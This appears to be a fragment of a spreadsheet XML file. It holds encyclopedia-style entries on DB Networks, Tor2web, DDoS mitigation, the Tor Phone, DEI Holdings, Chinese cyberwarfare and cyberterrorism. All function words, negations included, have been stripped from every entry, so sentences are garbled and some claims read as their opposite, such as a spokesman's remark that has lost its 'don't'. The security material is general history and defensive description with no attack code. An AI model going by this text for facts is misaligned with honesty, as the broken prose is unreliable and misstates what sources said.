    <t>networks privately held information security company founded united states company headquartered diego, california, regional offices located palo alto, california seattle, washington.in 2018, networks announced change company name cybertech. history networks founded united states 2009 provide database security including database infrastructure assessment, compromised credential identification, injection defense, predominantly financial services industry federal government. company initially financed angel investors. 2012 company raised $4.5m venture capital khosla ventures. 2014 company closed million round funding khosla ventures grotech ventures.the company's first product, adf-4200, launched february 2013. also february 2013 company announced partnership alamo city engineering services (aces) offer products military civilian federal agencies. october 2013 company announced ids-6300, later renamed dbn-6300, originally injection defense database infrastructure security product.in 2013 networks invited join cync cybersecurity technology program direction northrop grumman university maryland, baltimore county research park corporation. cync program identifies innovative technologies combat cybersecurity threats.in 2014 tech solutions announced channel partner offer network products nasa solutions enterprise-wide procurement (sewp) contract united states federal agencies.in 2015 networks awarded united states patents database security technologies.db networks began licensing database security software technologies original equipment manufacturers (oems) february 2016 coinciding launch layer database sensor. partnerships announced fireeye, cyphort, security on-demand. technology networks database security technology based machine learning behavioral analysis opposed traditional information security approach requiring human generated blacklists whitelists. machine learning behavioral analysis platform learns applications' proper transaction behavior. compromised credentials rogue statements, injection attack, deviate established model raise alarm database attack. machine learning behavioral analysis technologies ability prevent advanced zero-day database attacks without prior threat intelligence need establish maintain signature files known attack strings. products networks dbn-6300 announced october 2013 (originally referred ids-6300). dbn-6300 purpose-built database security appliance. uses machine learning behavioral analysis identify database attacks real-time. virtual appliance version dbn-6300 launched february 2014, referred dbn-6300v.the layer database sensor launched february 2016. layer database sensor enables information security product manufactures integrate networks database security technology products.in march 2016, "insider threat" protection capabilities added dbn-6300 layer database sensor products. industry recognition 2016 best data center security solution 2016 cyber defense magazine grand trophy info security awards top-30 cybersecurity providers silicon valley ranked cybersecurity 5002015 best data center security product 2015 cyber defense magazine grand trophy info security awards cyber security companies2014 review's most promising enterprise security companies "grand global excellence" trophy best best security technology info security's global excellence awards most innovative intrusion detection system 2014 cyber defense magazine finalist magazine 2014 best database security solution2013 finalist magazine 2013 best database security solution 2013 info security's global excellence awardsgold winner database security gold winner firewalls gold winner product launch also relational database information security digital forensics code injection cyberwarfare references external links official website</t>
  </si>
  <si>
    <t>TorBook</t>
  </si>
  <si>
    <t>Tor2web</t>
  </si>
  <si>
    <t>tor2web (pronounced "tor web") software project allow hidden services accessed standard browser without connected network. created aaron swartz virgil griffith. history network enables people internet anonymously (though known weaknesses) publish content "hidden services", exist within network security reasons thus typically accessible relatively small number people using tor-connected browser. aaron swartz virgil griffith developed tor2web 2008 support whistleblowing forms anonymous publishing tor, allowing materials remain anonymous making accessible broader audience. interview wired swartz explained great anonymous publishing, focus user-friendliness thus many people would install wanted "produce hybrid people could publish stuff using make anyone internet could view it".the software developed swartz griffith today considered version 1.0. since then, maintained developed giovanni pellerano hermes center transparency digital human rights part globaleaks project, financial support open technology fund. version released august 2011, version beta december 2014. operation security rather typical top-level domains like .com, .org, .net, hidden service urls .onion accessible connected tor. tor2web acts specialized proxy middleman hidden services users, making visible people connected tor. user takes hidden service replaces .onion .onion.to. like tor, tor2web operates using servers voluntarily open community individuals organizations. tor2web preserves anonymity content publishers anonymity tool offer protection users beyond relaying data using http secure (https). since version 2.0, privacy security warning added header page fetches, encouraging readers browser bundle obtain anonymity. also dark references external links official website</t>
  </si>
  <si>
    <t>DDoS mitigation</t>
  </si>
  <si>
    <t>ddos mitigation network management techniques and/or tools, resisting mitigating impact distributed denial-of-service (ddos) attacks networks attached internet, protecting target, relay networks. ddos attacks constant threat businesses organisations, delaying service performance, shutting website entirely.the first thing ddos mitigation identify normal conditions network traffic analysing "traffic patterns", necessary threat detection alerting. ddos mitigation also requires identifying incoming traffic, separate human traffic human-like bots hijacked browsers. this process involves comparing signatures examining different attributes traffic, including addresses, cookie variations, http headers, javascript fingerprints. after detection made, next process filtering. filtering done anti-ddos technology like connection tracking, reputation lists, deep packet inspection, blacklisting/whitelisting, rate limiting.one technique pass network traffic addressed potential target network high-capacity networks, "traffic scrubbing" filters.manual ddos mitigation longer recommended, size attacks often outstripping human resources available many firms/organisations. other methods prevent ddos attacks implemented, on-premises and/or cloud-based solution providers. on-premises mitigation technology (most commonly hardware device) often placed front network. this would limit maximum bandwidth available provided internet service provider. common methods involve hybrid solutions, combining on-premises filtering cloud-based solutions. methods attack ddos attacks executed websites networks selected victims. number vendors offer "ddos resistant" hosting services, mostly based techniques similar content delivery networks. distribution avoids single point congestion, prevents ddos attack concentrating single target. technique ddos attacks misconfigured third-party networks, allowing amplification spoofed packets. proper configuration network equipment, enabling ingress filtering egress filtering, documented 6959, prevents amplification spoofing, thus reducing number relay networks available attackers. methods mitigation client puzzle protocol, guided tour puzzle protocol content delivery network blacklist addresses intrusion detection system firewall also internet security threat vulnerability (computing) ddos cybercrime cyberattack references</t>
  </si>
  <si>
    <t>Tor Phone</t>
  </si>
  <si>
    <t>phone refers concept smartphone routes internet connections network. first phone prototype smartphone released 2016 project, gave users ability route internet connections anonymity. work phone launched 2014, "tor-enabled android phone prototype" announced 2016. project mike perry, browser lead developer. background phone refers smartphone route internet connections network, example using orbot application android settings, although according developer mike perry 2016, android's apis secure could leak data boot, affects orbot too. prototype phone based copperheados, added additional security features. another option torbrowser smartphones. follow-on project, grapheneos continues supporting usage orbot (tor) torbrowser android-based phones. adoption number users phones unknown. 2016 million daily users, total, including devices methods.in 2018 louis adam zdnet france discussed official support project services android phones, including browser orbot.john corpuz toms guide listed browser (desktop android), onion browser (ios) "best blockers 2021". related projects january 2015 david briggs nick spriggs began unsuccessful indiegogo campaign make boss phone, android-based phone "rooted encryption" anonymize privatize internet browsing.in 2014 blackphone silent circle sold android-based phone applications services provide secure messaging, cloud storage. 2014 boeing black phone advertised secure android-based phone, dual-sim using public government networks.in 2014 mobile version tails operating system announced.in 2012 ninja phone, phone running android 4.0.3, developed demonstrate using independent phone network defcon. network operated ninja van, official looking logo, base station; 12-foot antenna; networking servers parked large room defcon. also replicant (operating system) references external links mission improbable github mission impossible github project mobile support project mobile documentation</t>
  </si>
  <si>
    <t>DACL</t>
  </si>
  <si>
    <t>DEI Holdings</t>
  </si>
  <si>
    <t>holdings parent company several brands consumer audio electronics vehicle security/remote start systems. holdings owned york city boston-based private equity firm charlesbank capital partners. history company became holdings founded future representative darrell issa wife kathy 1982 directed electronics, darrell issa serving first ceo. 2000, darrell issa elected house representatives, minarik replaced ceo.in 2004, firm bought speaker company definitive technology; 2006, bought polk audio.in 2008, companies adapted holding company strategy, parent became holdings, inc.in 2011, company bought private equity firm charlesbank capital partners.in april 2013, company combined polk, definitive technology boom movement brands division called sound united.in august 2016, kevin duffy named company's ceo, replacing retiring minarik.in march 2017, sound united audio division acquired consumer electronics company group, whose various brands included denon, heos denon, marantz boston acoustics. time, world's largest supplier audio/video receivers.in october 2020 sound united acquired bowers wilkins.in march 2021 sound united acquired australia's leading importer distributor phome entertainment systems qualifi ltd. qualifi australian importer distributor blustream, denon, elan, forte, furman, heos, jamo, klipsch, marantz, niles, stealth acoustics, sunfire, thorens xantech brands high-quality home entertainment components systems. qualifi based mount waverley, victoria incorporates service department servicing repair products distributed them. brands dei's sound united organization audio electronics division includes denon, marantz, boston acoustics, heos denon (under group); polk audio; definitive technology, bowers wilkins. references external links official website</t>
  </si>
  <si>
    <t>Cyberwarfare in China</t>
  </si>
  <si>
    <t>cyberwarfare china aggregate combative activities cyberspace taken organs people's republic china, including affiliated advanced persistent threat groups, countries. organization while details remain unconfirmed, understood china organizes resources follows: “specialized military network warfare forces” (chinese: 军队专业网络战力量) military units specialized network attack defense. "pla authorized forces” (授权力量) network warfare specialists ministry state security (mss) ministry public security (mps). “non-governmental forces” (民间力量) civilian semi-civilian groups spontaneously engage network attack defense.foreign policy provided estimated range china's "hacker army" personnel, anywhere 50,000 100,000 individuals.in response claims chinese universities, businesses, politicians subject cyber espionage united states national security agency since 2009, announced cyber security squad 2011 defend networks. accusations espionage cyber-attacks australia 2013, news claimed china stole blueprints headquarters australian security intelligence organisation. canada officials canadian government claimed chinese hackers compromised several departments within federal government early 2011, though chinese government denied involvement. 2014, canada's chief information officer claimed chinese hackers compromised computer systems within national research council. india officials indian government believe attacks indian government networks, attack indian national security council, originated china. according indian government, chinese hackers experts operating botnets, used attacks. additionally, instances chinese cyberattacks india's cyberspace reported multitude. japan april 2021 japan claimed chinese military ordered cyberattacks japanese companies research institutes, including jaxa. united states united states america accused china cyberwarfare attacks targeted networks important american military, commercial, research, industrial organisations. congressional advisory group declared china "the single greatest risk security american technologies" "there marked increase cyber intrusions originating china targeting u.s. government defense-related computer systems".in january 2010, google reported targeted attacks corporate infrastructure originating china "that resulted theft intellectual property google." gmail accounts belonging human rights activists compromised attack google's password system. american security experts connected google attack various political corporate espionage efforts originating china, included spying military, commercial, research, industrial corporations. obama administration officials called cyberattacks increasingly serious cyber threat critical industries."in addition google, least companies attacked. reported cases include northrop grumman, symantec, yahoo, chemical, adobe systems. cyber-espionage aimed commercial military interests.diplomatic cables highlight concerns china exploiting access microsoft source code boost offensive defensive capabilities.a number private computer security firms stated growing evidence cyber-espionage efforts originating china, including "comment group".china denied accusations cyberwarfare, accused united states engaging cyber-warfare accusations united states denies.during march 2013, high-level discussions continued.in 2014, federal grand jury united states indicted five unit 61398 officers charges theft confidential business information u.s. commercial firms planting malware computers.in september 2014, senate armed services committee probe revealed hackers associated chinese government committing various intrusions computer systems belonging u.s. airlines, technology companies contractors involved movement u.s. troops military equipment, october 2014, added hackers, believe backed chinese government, recently launched attacks u.s. companies.in 2015, office personnel management (opm) announced target data breach targeting records many 21.5 million people. washington post reported attack came china, citing unnamed government officials. director james comey explained deal national security perspective counterintelligence perspective. it's treasure trove information everybody worked for, tried work for, works united states government."in 2019, study showed continued attacks navy industrial partners.in february 2020, federal grand jury charged four members china's people's liberation army 2017 equifax hack. official account stated twitter played role "one largest thefts personally identifiable information state-sponsored hackers ever recorded", involving "145 million americans".the voice america reported april 2020 "u.s. intelligence agencies concluded chinese hackers meddled 2016 2018 elections" said "there already signs china-allied hackers engaged so-called "spear-phishing" attacks american political targets" ahead 2020 united states elections.in march 2021, united states intelligence community released analysis finding china considered interfering election decided concerns would fail backfire.in april 2021, fireeye said suspected chinese hackers used zero-day attack pulse connect secure devices, device, order dozens government, defense industry financial targets u.s. europe. taiwan comparing semiconductor industry china mainland taiwan today, taiwan leader terms overall competitiveness. august 2020, wired published report, stating "taiwan faced existential conflict china entire existence targeted china's state-sponsored hackers years. investigation taiwanese security firm revealed deeply single group chinese hackers able penetrate industry core taiwanese economy, pillaging practically entire semiconductor industry." ukraine april 2022, times reported days prior start 2022 russian invasion ukraine, cyberwarfare unit people's liberation army launched cyberattacks hundreds ukrainian government sites, according officials security service ukraine. vatican july 2020 reported chinese state-sponsored hackers operating named reddelta hacked vatican's computer network ahead negotiations china vatican. hijacking during minutes april 2010, state-owned china telecom advertised erroneous network routes instructed "massive volumes" u.s. foreign internet traffic chinese servers. defense department spokesman told reporters know "we've determined whether particular incident done malicious intent not" china telecom denied charge "hijacked" u.s. internet traffic. also 2011 canadian government hackings beijing–washington cyber hotline chinese intelligence activity abroad chinese information operations information warfare cyberwarfare russia death shane todd ghostnet google china honker union list cyber warfare forces china operation aurora operation shady titan rain people's liberation army strategic support force unit 61398 apollo 2021 microsoft exchange cyberattack references</t>
  </si>
  <si>
    <t>Cyberterrorism</t>
  </si>
  <si>
    <t xml:space="preserve">cyberterrorism internet conduct violent acts result threaten, loss life significant bodily harm, order achieve political ideological gains threat intimidation. acts deliberate, large-scale disruption computer networks, especially personal computers attached internet means tools computer viruses, computer worms, phishing, malicious software, hardware methods, programming scripts forms internet terrorism. cyberterrorism controversial term. some authors narrow definition, relating deployment known terrorist organizations disruption attacks information systems primary purpose creating alarm, panic, physical disruption. other authors prefer broader definition, includes cybercrime. participating cyberattack affects terror threat perception, even done violent approach. definitions, might difficult distinguish instances online activities cyberterrorism cybercrime.cyberterrorism also defined intentional computers, networks, public internet cause destruction harm personal objectives. experienced cyberterrorists, skilled terms hacking cause massive damage government systems might leave country fear attacks. objectives terrorists political ideological since considered form terror.there much concern government media sources potential damage could caused cyberterrorism, prompted efforts government agencies federal bureau investigation (fbi) central intelligence agency (cia) cyber attacks cyberterrorism.there several major minor instances cyberterrorism. al-qaeda utilized internet communicate supporters even recruit members. estonia, baltic country constantly evolving terms technology, became battleground cyberterror april 2007 disputes regarding relocation wwii soviet statue located estonia's capital tallinn. overview there debate basic definition scope cyberterrorism. these definitions narrow internet attack systems internet result violence persons property. they also broad, include form internet usage terrorists conventional attacks information technology infrastructures. there variation qualification motivation, targets, methods, centrality computer act. u.s. government agencies also varying definitions none attempted introduce standard binding outside sphere influence.depending context, cyberterrorism overlap considerably cybercrime, cyberwar ordinary terrorism. eugene kaspersky, founder kaspersky lab, feels "cyberterrorism" accurate term "cyberwar". states "with today's attacks, clueless strike again. it's cyber-war, cyberterrorism." also equates large-scale cyber weapons, flame virus nettraveler virus company discovered, biological weapons, claiming interconnected world, potential equally destructive.if cyberterrorism treated similarly traditional terrorism, includes attacks threaten property lives, defined leveraging target's computers information, particularly internet, cause physical, real-world harm severe disruption infrastructure. many academics researchers specialize terrorism studies suggest cyberterrorism exist really matter hacking information warfare. they disagree labeling terrorism unlikelihood creation fear, significant physical harm, death population using electronic means, considering current attack protective technologies. death physical damage could cause human harm considered necessary part cyberterrorism definition, identifiable incidents cyberterrorism, although much policy research public concern. modern terrorism political violence easily defined, however, scholars assert "unbounded" exclusively concerned physical damage.there saying death loss property side products terrorism, main purpose incidents create terror peoples' minds harm bystanders. incident cyberspace create terror, rightly called cyberterrorism. affected acts, fears cyberterrorism quite real.as cybercrime general, threshold required knowledge skills perpetrate acts cyberterrorism steadily diminishing thanks freely available hacking suites online courses. additionally, physical virtual worlds merging accelerated rate, making many targets opportunity evidenced notable cyber attacks stuxnet, saudi petrochemical sabotage attempt 2018 others. defining cyberterrorism assigning concrete definition cyberterrorism hard, difficulty defining term terrorism itself. multiple organizations created definitions, overly broad. there also controversy concerning overuse term, hyperbole media security vendors trying sell "solutions".one understanding cyberterrorism involves idea terrorists could cause massive loss life, worldwide economic chaos environmental damage hacking critical infrastructure systems. nature cyberterrorism covers conduct involving computer internet technology that: motivated political, religious ideological cause intended intimidate government section public varying degrees seriously interferes infrastructurethe term "cyberterrorism" used variety different ways, limits use. attack internet business labeled cyberterrorism, however done economic motivations rather ideological typically regarded cybercrime. convention also limits label "cyberterrorism" actions individuals, independent groups, organizations. form cyberwarfare conducted governments states would regulated punishable international law. technolytics institute defines cyberterrorism [t]he premeditated disruptive activities, threat thereof, computers and/or networks, intention cause harm social, ideological, religious, political similar objectives. intimidate person furtherance objectives. term appears first defense literature, surfacing "cyber-terrorism") reports u.s. army college early 1998.the national conference state legislatures, organization legislators created help policymakers united states issues economy homeland security defines cyberterrorism [t]he information technology terrorist groups individuals agenda. this include information technology organize execute attacks networks, computer systems telecommunications infrastructures, exchanging information making threats electronically. examples hacking computer systems, introducing viruses vulnerable networks, site defacing, denial-of-service attacks, terroristic threats made electronic communication. nato defines cyberterrorism "[a] cyberattack using exploiting computer communication networks cause sufficient destruction disruption generate fear intimidate society ideological goal". united states national infrastructure protection center defined cyberterrorism criminal perpetrated computers telecommunications capabilities resulting violence, destruction, and/or disruption services create fear causing confusion uncertainty within given population, goal influencing government population conform political, social, ideological agenda. fbi, another united states agency, defines "cyber terrorism" "premeditated, politically motivated attack information, computer systems, computer programs, data results violence non-combatant targets subnational groups clandestine agents".these definitions tend share view cyberterrorism politically and/or ideologically inclined. area debate difference cyberterrorism hacktivism. hacktivism "the marriage hacking political activism". both actions politically driven involve using computers, however cyberterrorism primarily used cause harm. becomes issue acts violence computer labeled either cyberterrorism hacktivism. types cyberterror capability 1999 center study terrorism irregular warfare naval postgraduate school monterey, california, defined three levels cyberterror capability: simple-unstructured: capability conduct basic hacks individual systems using tools created someone else. organization possesses little target-analysis, command-and-control, learning capability. advanced-structured: capability conduct sophisticated attacks multiple systems networks possibly, modify create basic hacking-tools. organization possesses elementary target-analysis, command-and-control, learning capability. complex-coordinated: capability coordinated attack capable causing mass-disruption integrated, heterogeneous defenses (including cryptography). ability create sophisticated hacking tools. highly capable target-analysis, command-and-control, organization learning-capability. concerns cyberterrorism becoming prominent social media today. internet becomes pervasive, individuals groups anonymity afforded cyberspace threaten individuals, specific groups (with membership based, example, ethnicity belief), communities entire countries, without inherent threat identification, capture, injury, death attacker physically present would bring. many groups anonymous, tools denial-of-service attacks attack censor groups oppose them, creating many concerns freedom respect differences thought. many believe cyberterrorism extreme threat countries' economies, fear attack could potentially lead another great depression. several leaders agree cyberterrorism highest percentage threat possible attacks u.s. territory. although natural disasters considered threat proven devastating people land, ultimately little done prevent events happening. thus, expectation focus preventative measures make internet attacks impossible execution.as internet continues expand, computer systems continue assigned increased responsibility becoming complex interdependent, sabotage terrorism internet become serious threat possibly events "end human race." people much easier access illegal involvement within cyberspace ability access part internet known dark web.(registration required) internet things promises merge virtual physical worlds, experts powerful incentive states terrorist proxies furtherance objectives.dependence internet rapidly increasing worldwide scale, creating platform international cyber-terror plots formulated executed direct threat national security. terrorists, cyber-based attacks distinct advantages physical attacks. they conducted remotely, anonymously, relatively cheaply, require significant investment weapons, explosives personnel. effects widespread profound. incidents cyberterrorism likely increase. they expected take place denial-of-service attacks, malware, methods difficult envision today. example involves deaths involving islamic state online social networks twitter, google, facebook leading legal action taken them, ultimately resulted sued. article cyber attacks iran north korea, york times observes: appeal digital weapons similar nuclear capability: outgunned, outfinanced nation even playing field. "these countries pursuing cyberweapons pursuing nuclear weapons," said james lewis, computer security expert center strategic international studies washington. "it's primitive; line, good enough committed getting it." history public interest cyberterrorism began late 1990s, term coined barry collin. 2000 approached, fear uncertainty millennium heightened, potential attacks cyber terrorists. although millennium means terrorist attack plot world united states, catalyst sparking fears possibly large-scale devastating cyber-attack. commentators noted many facts incidents seemed change, often exaggerated media reports. high-profile terrorist attacks united states september 2001, ensuing terror media coverage potential threats cyberterrorism years following. mainstream media coverage often discusses possibility large attack making computer networks sabotage critical infrastructures putting human lives jeopardy causing disruption national scale either directly disruption national economy.authors winn schwartau john arquilla reported considerable financial success selling books described purported plausible scenarios mayhem caused cyberterrorism. many critics claim books unrealistic assessments whether attacks described (such nuclear meltdowns chemical plant explosions) possible. common thread throughout critics perceive cyberterror-hype non-falsifiability; predicted disasters fail occur, goes show lucky we've far, rather impugning theory. 2016, first time ever, department justice charged ardit ferizi cyberterrorism. accused allegedly hacking military website stealing names, addresses, personal information government military personnel selling isis.on hand, also argued that, despite substantial studies cyberterrorism, body literature still unable present realistic estimate actual threat. instance, case cyberterrorist attack public infrastructure power plant traffic control hacking, uncertainty success data concerning phenomena limited. current threats cyberterrorism ranks among highest potential security threats world. become critical development nuclear weapons current conflicts nations. pervasiveness internet amount responsibility assigned technology, digital weapons pose threat entire economic social systems. some critical international security concerns include: ddos attacks millions denial service attacks occur every year service disruption cost hundreds thousands dollars hour down. important keep critical systems secured redundant remain online attacks. social engineering 1997 experiment conducted concluded thirty five-hackers able access critical pentagon computer systems could easily edit accounts, reformat data even shut entire systems. often used phishing tactics calling offices pretending technicians gain passwords. third party software retailers connected thousands separate third-party recourses least assets least critical vulnerability. these companies need manage reevaluate network security order keep personal data safe. future threats technology becomes integrated society, vulnerabilities security threats opened complex networks intruder gain access networks potential threaten entire communities economic systems. there certainty events take place future, important systems build adapt changing environment. apparent cyberterrorism threat near future involve state remote work covid-19 pandemic. companies cannot expect every home office date secure must adopt zero-trust policy home devices. this means must assume corporate resources unsecured devices sharing space must accordingly. rise cryptocurrency also sparked additional threats realm security. cyber criminals hijacking home computers company networks order mine certain cryptocurrencies bitcoin. this mining process requires immense amount computer processing power cripple business’ network lead severe downtime issue resolved. international attacks response conventions 2016 eighteen conventions major legal instruments specifically deal terrorist activities cyber terrorism. 1963: convention offences certain other acts committed board aircraft 1970: convention suppression unlawful seizure aircraft 1971: convention suppression unlawful acts against safety civil aviation 1973: convention prevention punishment crimes internationally protected persons 1979: international convention taking hostages 1980: convention physical protection nuclear material 1988: protocol suppression unlawful acts violence airports serving international civil aviation 1988: protocol suppression unlawful acts safety fixed platforms located continental shelf 1988: convention suppression unlawful acts safety maritime navigation 1989: supplementary convention suppression unlawful acts safety civil aviation 1991: convention marking plastic explosives purpose detection 1997: international convention suppression terrorist bombings 1999: international convention suppression financing terrorism 2005: protocol convention suppression unlawful acts safety maritime navigation 2005: international convention suppression acts nuclear terrorism 2010: protocol supplementary convention suppression unlawful seizure aircraft 2010: convention suppression unlawful acts relating international civil aviation 2014: protocol amend convention offences certain acts committed board aircraft motivations cyberattacks there many different motives cyberattacks, majority financial reasons. however, increasing evidence hackers becoming politically motivated. cyberterrorists aware governments reliant internet exploited result. example, mohammad ahmad as-sālim's piece ways serve participate jihad" discusses electronic jihad could disrupt west targeted hacks american websites, resources seen anti-jihad, modernist, secular orientation (denning, 2010; leyden, 2007).many cyberattacks conducted money, rather cyberattacks conducted different ideological beliefs wanting personal revenge outrage towards company individual, cybercriminal attacking. employee might want revenge company mistreated wrongfully terminated.other motivations cybercriminals include: political goals competition companies cyberwarfare countries moneypolitical goals motivate cyber-attackers happy candidates might want certain candidates election, therefore, might alter election voting help preferred candidate win. competition companies also stir cyberattack, company hire hacker conduct attack company might want test rival company's security. this also benefit company force competitor's customers think company secure getting cyber attacked effortlessly want personal credentials getting leaked. cyberwarfare motivation countries fighting other. this mainly used weaken opposing country compromising core systems countries data vulnerable information. money motivating cyber attacks ransomware, phishing, data theft cyber criminals differently contact victims money return data stays safe. international institutions united nations several agencies seek address cyberterrorism, including, united nations office counter-terrorism, united nations office drugs crime, united nations office disarmament affairs, united nations institute disarmament research, united nations interregional crime justice research institute, international telecommunication union. both europol interpol also notably specialize subject. both europol interpol specialize operations cyberterrorism collaborate different operations together host yearly joint cybercrime conference. while fight cybercrime, institutions operate differently. europol sets coordinates cross-border operations cybercriminals interpol helps enforcement coordinates operations cyber criminals globally. estonia nato baltic state estonia target massive denial-of-service attack ultimately rendered country offline shut services dependent internet connectivity april 2007. infrastructure estonia including everything online banking mobile phone networks government services access health care information disabled time. tech-dependent state experienced severe turmoil great deal concern nature intent attack. cyber attack result estonian-russian dispute removal bronze statue depicting world ii-era soviet soldier center capital, tallinn. midst armed conflict russia, georgia likewise subject sustained coordinated attacks electronic infrastructure august 2008. cases, circumstantial evidence point coordinated russian attacks, attribution attacks difficult; though countries blame moscow contributing cyber attacks, proof establishing legal culpability lacking. estonia joined nato 2004, prompted nato carefully monitor member states' response attack. nato also feared escalation possibility cascading effects beyond estonia's border nato members. 2008, directly result attacks, nato opened center excellence cyberdefense conduct research training cyber warfare tallinn.the chaos resulting attacks estonia illustrated world dependence countries information technology. this dependence makes countries vulnerable future cyber attacks terrorism.quick information cyber attack estonia effects country. online services estoninan banks government services taken uncontrollable high level internet traffic media outlets also broadcasters could deliver news cyber attacks some services attack days, online services taken completely riots looting went hours tallinn, estonia cyber attack served wake call estonia entire world importance cyber defence.as cyberattacks continue increase around world, countries still look attacks estonia 2007 example countries fight future cyberattacks terrorism. result attacks, estonia currently countries cyber defence online safety capital city tallinn home nato’s cyber defense hub. government estonia continues update cyber defence protocols national cybersecurity strategies. nato’s coopeative cyber defence centre tallinn also conducts research training cyber security help estonia countries alliance. china chinese defense ministry confirmed existence online defense unit 2011. composed thirty elite internet specialists, so-called "cyber blue team", "blue army", officially claimed engaged cyber-defense operations, though fears unit used penetrate secure online systems foreign governments. china's leaders invested foundations cyber defense quantum computing artificial intelligence. chinese soldiers chosen strengthen china's cyber defenses. reason given spokesman ministry national defense, geng yansheng internet protection currently weak. geng claimed program temporary help improve cyber defenses. india counter cyber terrorists, also called "white-collar jihadis", police india registered private citizens volunteers patrol internet report suspected cyber terrorists government. these volunteers categorised three categories, namely "unlawful content flaggers", "cyber awareness promoters" "cyber experts". august 2021, police arrested five suspected white-collar jihadis preparing list officers, journalists, social activists, lawyers political functionaries create fear among people. white-collar jihadis considered "worst kind terrorists" remain anonymous safe nations, inflict "immeasurable" amount damage brainwashing.in india, demand cyber security professionals increased cent 2021 rise cent 2024.eighty percent companies india ransomware attack year 2020. cost takes recover ransomware attack india gone $1.1 million 2020 $3.38 million 2021. india list countries ransomware attacks. cyber-attack took place electricity grid maharashtra resulted power outage. this occurred october 2020 authorities believe china behind it.important information like dates birth full names leaked thousands patients tested covid-19. this information made accessible google leaked government websites. portal iimjobs attacked information million people looking jobs leaked. information leaked quite extensive including location users names phone numbers. information 500,000 indian police personal sold forum february 2021. information contained much personal information. data police exam taken december 2019. korea according 2016 deloitte asia-pacific defense outlook, south korea's 'cyber risk score' 1,000 south korea found vulnerable country cyber attacks asia-pacific region. considering south korea's high speed internet cutting-edge technology, cyber security infrastructure relatively weak. 2013 south korea cyberattack significantly damaged korean economy. this attack wounded systems banks computer networks three broadcasters. incident massive blow, attacker never identified. theorized north korea. week north korea accused united states south korea shutting internet days. 2017, ransomware attack harassed private companies users, experienced personal information leakage. additionally, north korea's cyber attacks risked national security south korea.in response this, south korean government's countermeasure protect information security centres national intelligence agency. currently, 'cyber security' major goals korea. since 2013, south korea established policies related national cyber security trying prevent cyber crises sophisticated investigation potential threats. meanwhile, scholars emphasize improving national consciousness towards cyber attacks south korea already entered so-called 'hyper connected society'. north korea's cyberwarfare incredibly efficient best state-sponsored hackers. those chosen hackers selected young trained specifically cyberwarfare. hackers trained steal money atms enough reported. north korea great zero-day exploits. country hack anyone chose they steal secrets companies government agencies steal money financial systems fund hacking operations. pakistan pakistani government also taken steps curb menace cyberterrorism extremist propaganda. national counter terrorism authority (nacta) working joint programs different ngos cyber security organizations pakistan combat problem. surf safe pakistan example. people pakistan report extremist terrorist related content online surf safe pakistan portal. national counter terrorism authority (nacta) provides federal government's leadership surf safe campaign. ukraine series powerful cyber attacks began june 2017, swamped websites ukrainian organizations, including banks, ministries, newspapers electricity firms. department defense (dod) charged united states strategic command duty combating cyberterrorism. this accomplished joint task force-global network operations, operational component supporting usstratcom defense dod's global information grid. this done integrating capabilities operations computers, networks, systems used combatant commands, services agencies. november 2006, secretary force announced creation force's newest majcom, force cyber command, would tasked monitor defend american interest cyberspace. plan however replaced creation twenty-fourth force became active august 2009 would component planned united states cyber command.on december 2009, white house named head computer security howard schmidt coordinate government, military intelligence efforts repel hackers. left position 2012. michael daniel appointed position white house coordinator cyber security week continues position second term obama administration.obama signed executive order enable impose sanctions either individuals entities suspected participating cyber related acts. these acts assessed possible threats national security, financial issues foreign policy issues. u.s. authorities indicted cyberterrorism hacks attacks computers used department defense. nebraska-based consortium apprehended four million hacking attempts course eight weeks. 2011 cyberterrorism attacks grew 20%.in 2021, president biden announced executive order aiming improve america's cybersecurity. came increase cybersecurity attacks aimed country's public private sector. plan aims improve government's cyberdefense working ability identify, deter, protect against, detect, respond attacks. plan sections written document include, name few, improving sharing threat information, modernizing government's cybersecurity, establishing cybersecurity review board. examples operation done anyone anywhere world, performed thousands miles away target. attack cause serious damage critical infrastructure result casualties.some attacks conducted furtherance political social objectives, following examples illustrate: 1996, computer hacker allegedly associated white supremacist movement temporarily disabled massachusetts damaged part isp's record keeping system. attempted stop hacker sending worldwide racist messages isp's name. hacker signed threat: "you true electronic terrorism. this promise." 1998, spanish protesters bombarded institute global communications (igc) thousands bogus e-mail messages. e-mail tied undeliverable isp's users, support lines tied people mail. protestors also spammed staff member accounts, clogged page bogus credit card orders, threatened employ tactics organizations using services. they demanded stop hosting site euskal herria journal, york-based publication supporting basque independence. protestors said supported terrorism section pages contained materials terrorist group eta, claimed responsibility assassinations spanish political security officials, attacks military installations. finally relented pulled site "mail bombings". 1998, ethnic tamil guerrillas attempted disrupt lankan embassies sending large volumes e-mail. embassies received e-mails two-week period. messages read internet black tigers we're disrupt communications." intelligence authorities characterized first known attack terrorists country's computer systems. during kosovo conflict 1999, nato computers blasted e-mail bombs denial-of-service attacks hacktivists protesting nato bombings. addition, businesses, public organizations academic institutes received highly politicized virus-laden e-mails range eastern european countries, according reports. defacements also common. after chinese embassy accidentally bombed belgrade, chinese hacktivists posted messages stop attacking stops!" u.s. government sites. since december 1997, electronic disturbance theater (edt) conducting sit-ins various sites support mexican zapatistas. designated time, thousands protestors point browsers target site using software floods target rapid repeated download requests. edt's software also used animal rights groups organizations said abuse animals. electrohippies, another group hacktivists, conducted sit-ins seattle late 1999. these sit-ins require mass participation much effect, thus suited activists terrorists. 2000, japanese investigation revealed government using software developed computer companies affiliated shinrikyo, doomsday sect responsible sarin attack tokyo subway system 1995. "the government found types software programs used least japanese government agencies, including defense ministry, major japanese companies, including nippon telegraph telephone." following discovery, japanese government suspended aum-developed programs concern aum-related companies compromised security breaching firewalls. gaining access sensitive systems information, allowing invasion outsiders, planting viruses could later, planting malicious code could cripple computer systems data system. march 2013, york times reported pattern cyber attacks u.s. financial institutions believed instigated iran well incidents affecting south korean financial institutions originate north korean government. august 2013, media companies including york times, twitter huffington post lost control websites hackers supporting syrian government breached australian internet company manages many major site addresses. syrian electronic army, hacker group previously attacked media organisations considers hostile regime syrian president bashar al-assad, claimed credit twitter huffington post hacks series twitter messages. electronic records showed nytimes.com, site hours-long outage, redirected visitors server controlled syrian group went dark. pakistani cyber army name taken group hackers known defacement websites, particularly indian, chinese, israeli companies governmental organizations, claiming represent pakistani nationalist islamic interests. group thought active since least 2008, maintains active presence social media, especially facebook. members claimed responsibility hijacking websites belonging acer, bsnl, india's cbi, central bank, state government kerala. british hacker kane gamble, sentenced years youth detention, posed chief access highly sensitive information. also "cyber-terrorized" high-profile u.s. intelligence officials chief john brennan director national intelligence james clapper. judge said gamble engaged "politically motivated cyber terrorism". march 2021 hackers affiliated russia reported targeted lithuanian officials decision makers. cyber-espionage group apt29 believed 